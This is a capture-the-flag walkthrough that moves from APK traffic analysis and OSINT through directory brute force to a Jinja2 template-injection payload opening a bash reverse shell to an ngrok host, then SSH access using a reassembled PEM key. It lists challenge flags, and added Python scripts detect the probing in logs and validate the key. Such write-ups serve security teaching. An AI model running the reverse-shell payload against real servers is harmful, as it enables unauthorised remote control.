
We have an APK that requires reverse engineering. By analyzing it, we can gather clues related to machines M1 and M2. Let's get started by downloading the APK.
First, we perform traffic analysis using Burp Suite or any other technique. In this case, I used PcapDroid from the Play Store to monitor the network traffic of our APK (h4ckp13t.apk). During the analysis, I discovered the following:
When you open this link, you will find:
Now, using the BSSID, it's a straightforward OSINT challenge to determine the location. Let's look it up on wigle.net.
Doing Advanced Search -> WiFi Search:
CTF ANSWERS
- PROVIDE WIFI NAME: CRMCWiFi
- PROVIDE COUNTRY OF HIDDEN SPOT: USA
OSINT CHALLENGE COMPLETED
Following the previous hint, there is something hidden in the reviews. We navigate to Google Maps, search for the same area, and filter the results using the newest option as per the hint.
Bingo!! Now it's time to decode $xx,xxx,xxx,xxx into an IP address of the form xx.xxx.xxx.xxx. Following the previous hint, we obtain the IP address 64.227.150.103.
Now, open the About page and also inspect the page source of both websites as part of the reconnaissance process.
In the page source, we discovered another flag.
One More Flag
- Website Recon Master: H4CKP13T{YES_patch_error_302}
Now, following the Cyber Kill Chain methodology, we begin scanning with Nmap. The scan reveals several open ports, including 80, 21, 22, and 5000.
Port 22 is not exploitable because it runs the latest version of SSH. Now, let's investigate port 21.
Hmm, it behaves like a honeypot, so we’ll ignore this port and move on to port 5000.
It displays the message "Direct access not allowed." You might be surprised to learn that two web servers are running at the same time on different ports; this is because Apache2 acts as a reverse proxy in front of the second one.
In the end, we have no choice but to focus on port 80. But when I navigate to about.flag.hint, it redirects me to the Rock You page. Then I check /robots.txt.
Every clue keeps redirecting me to the RockYou file. Earlier, we found a file named rockyou.txt.enc, which was decrypted using Cyndia's product, The Files Lab, with a given password. I searched on Google, found the tool, and successfully decrypted the file.
Now I have rockyou.txt.
Let's perform a directory brute-force attack against 64.227.150.103 using Dirb or any other tool with the given wordlist.
After some time, I discovered a login page named C2 Admin Panel at http://64.227.150.103/abygurl69
Let's explore and investigate it.
After testing different parameters, I found that it is vulnerable to SSTI (Server-Side Template Injection). Let's attempt Remote Code Execution (RCE).
Using this payload, we gain control of Machine 1:
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{ x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >& /dev/tcp/0.tcp.in.ngrok.io/10327 0>&1'").read() }}
{% endif %}
{% endfor %}
Before that, let's set up our reverse shell listener using port forwarding with Ngrok.
After submitting the payload, we successfully obtain a reverse shell on Machine 1. We then use the cat command to read the flag.
- user-machine-1 flag: h4ckp13t{cyunas_cyberdefentech_a2e7vta}
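Seen from the server side, the two steps above (the directory brute force with the wordlist and the template-injection attempts against the panel) leave characteristic traces in the web server's access log. The following Python script is an added example, not code from the writeup or the CTF author: it parses constructed Apache combined-format log lines (sample data, not real traffic), flags a client that exceeds a 404 threshold, and URL-decodes each request path (twice, to catch double encoding) looking for Jinja2 delimiters and the dunder attributes the payload above relies on. The path /abygurl69 is taken from the writeup; the IPs, timestamps, threshold and all function names are my own assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" access-log line, the format a server like the one on port 80 would write.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Template delimiters and the dunder attributes a Jinja2 sandbox-escape payload needs.
SSTI_RE = re.compile(r"\{\{|\{%|__class__|__subclasses__|__builtins__|__import__|__globals__")

# Constructed sample traffic (not a real log): one client brute-forces paths, reaches the
# panel path from the writeup, then probes a parameter with template syntax.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /backup HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:03 +0000] "GET /config HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "GET /uploads HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:04 +0000] "GET /panel HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /abygurl69 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:10 +0000] "GET /abygurl69?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:00:11 +0000] "GET /abygurl69?name=%7B%25+for+x+in+().__class__.__base__.__subclasses__()+%25%7D HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:10:00:12 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:10:00:13 +0000] "GET /missing HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_path(path, rounds=2):
    """URL-decode repeatedly so double-encoded payloads are inspected in plain form."""
    for _ in range(rounds):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_ssti_indicator(path):
    """True when the decoded request path carries template delimiters or dunder lookups."""
    return SSTI_RE.search(decode_path(path)) is not None


def analyze(log_text, brute_threshold=5):
    """Return clients at or above the 404 threshold and every request with SSTI indicators."""
    not_found = Counter()
    ssti_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        if has_ssti_indicator(rec["path"]):
            ssti_hits.append((rec["ip"], decode_path(rec["path"])))
    brute = {ip: n for ip, n in not_found.items() if n >= brute_threshold}
    return {"brute_force": brute, "ssti": ssti_hits}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, n in result["brute_force"].items():
        print(f"possible directory brute force from {ip}: {n} x 404")
    for ip, path in result["ssti"]:
        print(f"SSTI indicator from {ip}: {path}")
```

The underlying bug that makes the payload work is that user input is concatenated into the template string itself; passing it to the template as a variable, so that Jinja2 renders it as data rather than code, removes the injection. The log check above is how a defender spots the probing that precedes it.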
BINGO! Let's move on to the final challenge.
Other files on this machine are rabbit holes. However, readme.dat contains a message instructing us to send an email to an admin user to obtain information about another machine. Let's gather the details and send an email using either a temporary or a real address. After some time, I received an auto-response email.
There is also a file named part1.pem. Based on my knowledge, PEM files hold private keys and are used for logging into an SSH instance with key-based authentication instead of a password.
Upon opening it, I noticed that some lines are missing. As per the user hint, the other half of the file is on Machine 2. Let's retrieve it and combine both parts.
Now, on to the other files.
After the email, I received:
Now that we have some information about Machine 2, let's run an Nmap scan. The scan reveals that ports 80, 22, and 8554 are open. Let's start by exploring port 80.
The webpage is vulnerable to buffer overflow. Let's proceed with reconnaissance by checking /robots.txt.
It indicates that something is running on port 8554 (which, according to Nmap, is an RTSP port). Let's check what’s happening at rtsp://54.174.231.114:8554/live
Amazing! I found the final part of the PEM file at https://h4ckp13t.piet.co.in/lovemelocalh0ste.
Now, set the correct permissions on the PEM file and connect via SSH using the following command:
ssh -i "machine2.pem" ubuntu@ec2-54-174-231-114.compute-1.amazonaws.com
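Reassembling a key from two halves is error-prone, and ssh will also refuse a key file that is readable by others. The script below is an added example and not part of the writeup: it joins the two text parts, verifies the PEM wrapper and base64 body, and for DER-encoded (PKCS#1/PKCS#8) keys compares the length declared in the outer SEQUENCE header with the decoded size, which catches a missing line that plain base64 decoding would not. It then writes the file with mode 0600 and checks the permission bits. The PEM content is a constructed placeholder with a DER-shaped body, not a real key; the file and function names are assumptions.

```python
import base64
import binascii
import os
import re
import stat
import tempfile

# One PEM block: header, base64 body, footer with the same label.
PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----\n(?P<body>[A-Za-z0-9+/=\n]+?)-----END (?P=label)-----"
)


def reassemble_pem(parts):
    """Concatenate the text parts in order, normalising CRLF and ensuring a final newline."""
    text = "".join(p.replace("\r\n", "\n") for p in parts)
    return text if text.endswith("\n") else text + "\n"


def der_declared_length(raw):
    """Total length a DER SEQUENCE claims (tag + length bytes + content), or None if not DER."""
    if len(raw) < 2 or raw[0] != 0x30:
        return None
    first = raw[1]
    if first < 0x80:                      # short form: one length byte
        return 2 + first
    n = first & 0x7F                      # long form: n following length bytes
    if n == 0 or len(raw) < 2 + n:
        return None
    return 2 + n + int.from_bytes(raw[2:2 + n], "big")


def validate_pem(text):
    """Return (ok, detail): checks BEGIN/END pairing, base64 validity and, for DER keys,
    that the decoded size matches the SEQUENCE header. OpenSSH-format keys are only
    checked for their magic string."""
    m = PEM_RE.search(text)
    if m is None:
        return False, "no matching BEGIN/END block"
    body = "".join(m.group("body").split())
    try:
        raw = base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError) as exc:
        return False, f"base64 decode failed: {exc}"
    if raw.startswith(b"openssh-key-v1\0"):
        return True, m.group("label")
    declared = der_declared_length(raw)
    if declared is None:
        return False, "body is neither DER nor OpenSSH key material"
    if declared != len(raw):
        return False, f"DER header declares {declared} bytes but body has {len(raw)} (lines missing?)"
    return True, m.group("label")


def write_key_file(text, directory=None):
    """Create the key file with mode 0600, as ssh requires, and return its path."""
    directory = directory or tempfile.mkdtemp(prefix="pemcheck-")
    path = os.path.join(directory, "machine2.pem")          # assumed file name
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(text)
    return path


def key_mode_ok(path):
    """True when no group/other permission bits are set (ssh rejects the key otherwise)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def constructed_pem():
    """Placeholder PEM with a DER-shaped body (NOT a real key): a SEQUENCE of 300 zero bytes."""
    content = bytes(300)
    raw = b"\x30\x82" + len(content).to_bytes(2, "big") + content
    b64 = base64.b64encode(raw).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN RSA PRIVATE KEY-----\n" + "\n".join(lines) + "\n-----END RSA PRIVATE KEY-----\n"


def split_pem(text, at_line):
    """Split a PEM into two text halves, mimicking part1.pem and the part found on Machine 2."""
    lines = text.splitlines(keepends=True)
    return "".join(lines[:at_line]), "".join(lines[at_line:])


if __name__ == "__main__":
    part1, part2 = split_pem(constructed_pem(), 4)
    print("part1 alone:", validate_pem(part1))
    joined = reassemble_pem([part1, part2])
    print("joined:", validate_pem(joined))
    path = write_key_file(joined)
    print(path, "mode ok:", key_mode_ok(path))
```

If validate_pem reports a length mismatch, the halves were joined out of order or a line is still missing; fix the file before trying ssh, whose "invalid format" error gives no hint about which.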
- user-m2 flag: h4ckp13t{congartulation_h4ckp13t_machine252141}
END - CTF CREDIT : @localh0ste aka Vikram Pawar